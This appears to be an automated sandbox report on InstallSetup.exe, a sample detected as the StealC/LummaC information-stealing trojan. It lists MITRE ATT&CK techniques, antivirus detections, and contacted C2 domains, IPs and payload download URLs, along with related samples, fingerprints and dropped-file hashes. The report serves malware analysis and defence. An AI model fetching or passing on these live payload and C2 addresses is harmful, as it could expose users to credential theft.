Source: Yara match	File source: Process Memory Space: C7B4.tmp.exe PID: 3032, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218CC
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BF6
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00961B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_00961B33
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00960E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00960E5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	11 Process Injection	4 Obfuscated Files or Information	LSASS Memory	23 File and Directory Discovery	Remote Desktop Protocol	31 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	22 Software Packing	Security Account Manager	44 System Information Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
InstallSetup.exe	68%	ReversingLabs	Win32.Trojan.StealC
InstallSetup.exe	100%	Avira	HEUR/AGEN.1312567
InstallSetup.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe	100%	Avira	HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	100%	Avira	HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe	68%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	68%	ReversingLabs	Win32.Trojan.StealC

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://rapeflowwj.lat/apij	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exeVt	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exeQt	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exeL	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exedt	0%	Avira URL Cloud	safe
https://post-to-me.com/track_prt.php?sub=0&cc=DEV	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/api	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
post-to-me.com	172.67.179.207	true	false		high
rapeflowwj.lat	172.67.220.223	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
necklacebudi.lat	false		high
aspecteirs.lat	false		high
energyaffai.lat	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false		high
sustainskelet.lat	false		high
crosshuaht.lat	false		high
rapeflowwj.lat	false		high
grannyejh.lat	false		high
discokeyus.lat	false		high
https://rapeflowwj.lat/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://post-to-me.com/track_prt.php?sub=&cc=DE	InstallSetup.exe, 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
https://duckduckgo.com/chrome_newtab	C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rapeflowwj.lat/apij	C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rapeflowwj.lat/	C7B4.tmp.exe, 00000003.00000002.1819502151.0000000003198000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.7.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe	InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exeQt	InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	InstallSetup.exe, 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exedt	InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/track_prt.php?sub=	InstallSetup.exe	false		high
http://176.113.115.19/ScreenUpdateSync.exeL	InstallSetup.exe, 00000000.00000002.3922562911.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DEV	InstallSetup.exe, 00000000.00000002.3922562911.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	C7B4.tmp.exe, 00000003.00000003.1661822214.00000000032ED000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exeVt	InstallSetup.exe, 00000000.00000003.1536908197.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/	InstallSetup.exe, 00000000.00000002.3922562911.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.179.207	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
172.67.220.223	rapeflowwj.lat	United States	13335	CLOUDFLARENETUS	true
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577460
Start date and time:	2024-12-18 13:48:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	InstallSetup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/7@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 91% Number of executed functions: 44 Number of non-executed functions: 328
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 4.245.163.56, 40.126.53.6, 13.107.246.63
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: InstallSetup.exe

Simulations

Behavior and APIs

Time	Type	Description
07:49:25	API Interceptor	8482136x Sleep call for process: InstallSetup.exe modified
07:49:32	API Interceptor	5x Sleep call for process: C7B4.tmp.exe modified
07:49:55	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.179.207	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse
	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse
	0r9PL33C8E.exe	Get hash	malicious	Stealc	Browse
	Pw2KHOL9Z8.exe	Get hash	malicious	Stealc	Browse
176.113.115.19	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	LXS5itpTK7.exe	Get hash	malicious	Stealc	Browse	176.113.115.19/ScreenUpdateSync.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rapeflowwj.lat	ScreenUpdateSync.exe	Get hash	malicious	LummaC	Browse	104.21.24.223
post-to-me.com	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	LXS5itpTK7.exe	Get hash	malicious	Stealc	Browse	104.21.56.70

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	ScreenUpdateSync.exe	Get hash	malicious	LummaC	Browse	104.21.24.223
	random.exe.10.exe	Get hash	malicious	LummaC	Browse	104.21.23.76
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	cali.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	http://www.mynylgbs.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://johnlewispartners.shop	Get hash	malicious	Unknown	Browse	104.19.163.95
	v_dolg.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254
	winrar-x64-701.exe	Get hash	malicious	Unknown	Browse	104.21.80.99
	CompleteStudio.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
CLOUDFLARENETUS	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	ScreenUpdateSync.exe	Get hash	malicious	LummaC	Browse	104.21.24.223
	random.exe.10.exe	Get hash	malicious	LummaC	Browse	104.21.23.76
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	cali.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	http://www.mynylgbs.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://johnlewispartners.shop	Get hash	malicious	Unknown	Browse	104.19.163.95
	v_dolg.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254
	winrar-x64-701.exe	Get hash	malicious	Unknown	Browse	104.21.80.99
	CompleteStudio.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
SELECTELRU	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	176.113.115.178
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	176.113.115.19

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	ScreenUpdateSync.exe	Get hash	malicious	LummaC	Browse	172.67.220.223
	random.exe.10.exe	Get hash	malicious	LummaC	Browse	172.67.220.223
	zq6a1iqg.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.220.223
	v_dolg.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.220.223
	winrar-x64-701.exe	Get hash	malicious	Unknown	Browse	172.67.220.223
	cccc2.exe	Get hash	malicious	LummaC	Browse	172.67.220.223
	CompleteStudio.exe	Get hash	malicious	LummaC	Browse	172.67.220.223
	winrar-x64-701.exe	Get hash	malicious	Unknown	Browse	172.67.220.223
	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse	172.67.220.223
	alexshlu.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.220.223
37f463bf4616ecd445d4a1937da06e19	T2dvU8f2xg.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.179.207
	z68scancopy.vbs	Get hash	malicious	FormBook	Browse	172.67.179.207
	oiBxz37xUo.dll	Get hash	malicious	Unknown	Browse	172.67.179.207
	T2dvU8f2xg.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	oiBxz37xUo.dll	Get hash	malicious	Unknown	Browse	172.67.179.207
	7nJ9Jo78Vq.dll	Get hash	malicious	Unknown	Browse	172.67.179.207
	7nJ9Jo78Vq.dll	Get hash	malicious	Unknown	Browse	172.67.179.207
	3zhEXB7iUp.dll	Get hash	malicious	Unknown	Browse	172.67.179.207
	i4VmSW2D4u.dll	Get hash	malicious	Unknown	Browse	172.67.179.207

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_C7B4.tmp.exe_742e65afcf5e79946837b92738bef5535819be8_85f1e870_f11681dd-b311-48cb-ae4e-cddbcb05ea98\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1743373805433623
Encrypted:	false
SSDEEP:	192:g1vgppJn0F7VyZFUjICBqQ6zuiFZZ24IO8I+:RpaF7VSFUjIW6zuiFZY4IO85
MD5:	A25B38A471E67EA3BFD7528926F15995
SHA1:	494801BBFE5984201A539A3660D174DC712CF954
SHA-256:	9C4DBFE7B0A32C4C609B559F32699B3A013E9FB0EA0AD8171DAB88C0E040BD90
SHA-512:	9F9B9F7836862E04CD84E7B68BA693C53D23919E21D63FEDB2750946F6A3B55AEBC06B1F63CB5E12E9E1E8EC0ACFD5CE4E2FD601935752FFA72588AF573171F5
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.9.9.7.8.4.0.8.2.3.8.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.9.9.7.8.4.6.7.6.1.3.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.1.6.8.1.d.d.-.b.3.1.1.-.4.8.c.b.-.a.e.4.e.-.c.d.d.b.c.b.0.5.e.a.9.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.d.1.e.f.0.7.-.8.7.a.b.-.4.8.5.1.-.8.e.f.f.-.6.c.d.d.8.4.0.4.d.8.5.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.7.B.4...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.d.8.-.0.0.0.1.-.0.0.1.4.-.1.3.5.6.-.3.7.4.6.4.b.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.0.f.c.d.2.c.8.7.1.0.6.3.0.2.8.c.1.9.7.7.9.2.d.5.3.c.d.5.f.0.2.0.0.0.0.f.f.f.f.!.0.0.0.0.9.1.7.d.a.5.4.9.8.5.6.f.d.1.c.b.8.8.7.6.d.6.a.a.9.7.f.2.0.4.f.4.6.e.4.2.a.2.f.e.!.C.7.B.4...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA32.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Dec 18 12:49:44 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	111320
Entropy (8bit):	2.2105160771688857
Encrypted:	false
SSDEEP:	384:RR9wKLL3W+QXzryivAi7QMC2XEM+j9Ei/DtRcJsIAYtgnoHowzHTQDohmlGlD:yKLzWnXzrzvAIQMPwDCx0DGd
MD5:	D847ECDC6138B3E1566ABD2238F2965E
SHA1:	B645E0558961E36C4481C488C7F55E851D4E00DD
SHA-256:	7F7C607B7BE0B57613E0AE4FD1B94474F9F80E54B6C5771D59104F2E4CB24AE1
SHA-512:	24F4B4E20C6EA81CADA8D61798E12C67892B984C7FA4F29A6CA06DC748A35B430080BC8898A25045FEEA4F28A35F17590D3EC0E6CB4156223A76DDA4F86DF111
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........bg........................."...............+...........W..........`.......8...........T...........`K..xg...........,..........................................................................................eJ..............GenuineIntel............T.............bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB8B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8422
Entropy (8bit):	3.6984724562175257
Encrypted:	false
SSDEEP:	192:R6l7wVeJOZ6fD6YVV6BgmftxdZFvpDM89baDsfDem:R6lXJI6r6Y36BgmftdFjaofT
MD5:	D87F352F328A32B16569CDC781FA7F96
SHA1:	2B02CFB337CF050BAC6EC9A8557C49A447BE6882
SHA-256:	C6977583E3920CF33DCDB03A37BAD1EE0E3904F71FE7B47C46862548178C4EE3
SHA-512:	2D0B6B5AA016B213137DAF8AEFB4F628DFF033ADF4798FB957F7346AB8F91FCA9858A362C90C30659461CE6F9EC410ECB754B620EBDE36D7BC992E574D8D2C64
Malicious:	false
Reputation:	low
